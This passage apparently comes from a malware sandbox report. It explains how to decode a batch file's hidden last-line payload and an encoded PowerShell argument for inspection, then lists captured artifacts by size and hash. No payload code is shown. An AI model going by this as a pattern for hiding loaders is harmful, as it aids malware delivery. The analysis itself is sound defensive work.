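To use it on the real artefact, read stub.bat as text and pass it to extract_last_line_payload; the returned string is what was written to $ktm-loader.ps1 and can be read without running it. The same decode_utf16le_b64 step applies to the -ec argument of $ktm-powershell.exe once it has been recovered from a fuller process log.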
Network
MITRE ATT&CK Enterprise v15
Downloads
Artifacts captured during the run (filenames did not extract on this page; sizes and hashes only):
- Filesize 440KB
  MD5: 0e9ccd796e251916133392539572a374
  SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
  SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
  SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
- Filesize 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize 128KB
  MD5: a9ae270f03cd818fc5ccb1fc114ed0f8
  SHA1: 57cfce4c18c0163fd41652ab89e4c51649eee492
  SHA256: c08bb34abb284c2fb15d4372c2c3c2387f71ebeb920be89c9079e96c7a4ca3ec
  SHA512: 5fa35050038e187b0be9547ff86e49aa5272a273eefb83472758da5b818e4e86eba254422b4524fb7a4bd66bd5c3ae210162cab1247b601ea1a3fc6454703ef0
- Filesize 699KB
  MD5: a89ae42f5a026c19299f9fa3278556cd
  SHA1: ec0a61aa2b89c9f80c734006446f124530e0f66b
  SHA256: 94ddaf67c6973113ef2992feab11bd2147194541c8c8efc82f7b51e89fc08a25
  SHA512: fad978dd060c6a507d8be487d8478f4f550c2e3fa440c8b3f90c19771f9e2b0d34ead3fad6f026ea233bbd5ec0f5274b7dc6bab4ea4d090322d4406edd3a836e
- Filesize 3KB
  MD5: b133a676d139032a27de3d9619e70091
  SHA1: 1248aa89938a13640252a79113930ede2f26f1fa
  SHA256: ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15
  SHA512: c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5
- Filesize 29KB
  MD5: ffdeea82ba4a5a65585103dd2a922dfe
  SHA1: 094c3794503245cc7dfa9e222d3504f449a5400b
  SHA256: c20b11dff802aa472265f4e9f330244ec4aca81b0009f6efcb2cf8a36086f390
  SHA512: 7570527fdae4818f0fc780f9f141ab6a2d313cc6b3fdb1f7d7ff05d994ad77d3f8d168b1d77c2555d25dc487d24c18f2cc0eab505d1dd758d709f2576aac1a8a